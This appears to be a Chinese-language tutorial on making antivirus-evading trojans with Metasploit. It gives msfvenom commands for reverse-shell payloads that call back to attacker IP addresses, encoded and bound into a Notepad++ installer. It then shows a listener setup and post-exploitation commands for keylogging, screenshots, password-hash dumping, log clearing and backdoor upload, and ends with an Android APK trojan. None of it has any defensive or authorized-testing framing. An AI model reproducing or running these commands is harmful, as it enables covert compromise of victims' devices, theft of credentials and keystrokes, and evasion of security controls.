1、制作exe免殺木馬
前言
免殺技術全稱為反殺毒技術 Anti-Virus
簡稱“免殺”,它指的是一種能使病毒木馬免於被殺毒軟件查殺的技術。由於免殺技術的涉獵面非常廣,其中包含反匯編、逆向工程、系統漏洞等技術,內容基本上都是修改病毒、木馬的內容改變特征碼,從而躲避了殺毒軟件的查殺。
MSF編碼
在 Meatsploit 框架下免殺的方式之一就是使用MSF編碼器。其功能是對攻擊載荷文件進行重新的排列編碼,改變可執行文件中的代碼形狀,避免被殺軟認出。MSF 編碼器可以將原可執行程序重新編碼,生成一個新的二進制文件,這個文件運行以后,MSF 編碼器會將原始程序解碼到內存中並執行。
1.1 查看編碼格式
在Kali終端輸入msfvemon -l encoders列出所有可用編碼格式。需要注意的是並不是所有的編碼方式都適用於Windows系統,建議使用x86/shikata_ga_nai格式
1.2 制作免殺木馬
由於裸奔木馬容易被殺毒軟件查殺,因此需要將木馬捆綁到一個正常的軟件上,這里使用notepad為例。
裸奔木馬
1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=1234 -f exe > /root/test.exe
免殺木馬
1 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.20.2 LPORT=3333 -e x86/shikata_ga_nai -x npp.7.8.6.Installer.exe -i 12 -f exe -o /root/npp1.exe
生成exe木馬文件
1.3 運行msf監聽模塊
1 msfconsole 2 use multi/handler4 set payload windows/shell_reverse_tcp 5 set LHOST 10.10.20.2 6 set LPORT 3333 7 exploit
1.4運行木馬程序
在Kali上開啟監聽,在客戶機上執行剛才生成的木馬文件,會自動連接上Kali,接下來就可以對客戶機進行遠程控制
1 meterpreter下的命令: 2 getwd 當前目錄 3 dir 查看所有文件 4 cat c:\123.txt 查看文件123.txt內容(數據是字符串傳遞,所以加一個轉義字符\) 5 search -f cmd.exe (搜索名為cmd.exe文件所在目錄) 6 upload /root/桌面/backldoor.exe(要上傳的文件) -> c:\(上傳到的目錄) 上傳文件 7 download c:\123txt /root 下載文件 8 clearev 清除日志 9 getuid 當前用戶 10 ps 查看所用進程 11 kill 殺死某個進程 12 sysinfo 系統信息 13 14 鍵盤記錄 15 keyscan_start 開始鍵盤記錄 16 keyscan_dump 查看結果 17 keyscan_stop 18 19 屏幕截圖 20 screenshot 21 22 屏幕監控 23 run vnc 24 25 獲取密文密碼 26 hashdump 27 28 shell 29 獲取shell,進入cmd
2、MSF制作安卓木馬
2.1 制作apk木馬程序
1 msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.105.184 LPORT=5555 R > /root/apk.apk
2.2其他步驟可以參考上述的步驟
2.3 命令
sysinfo
更多命令請使用help命令查看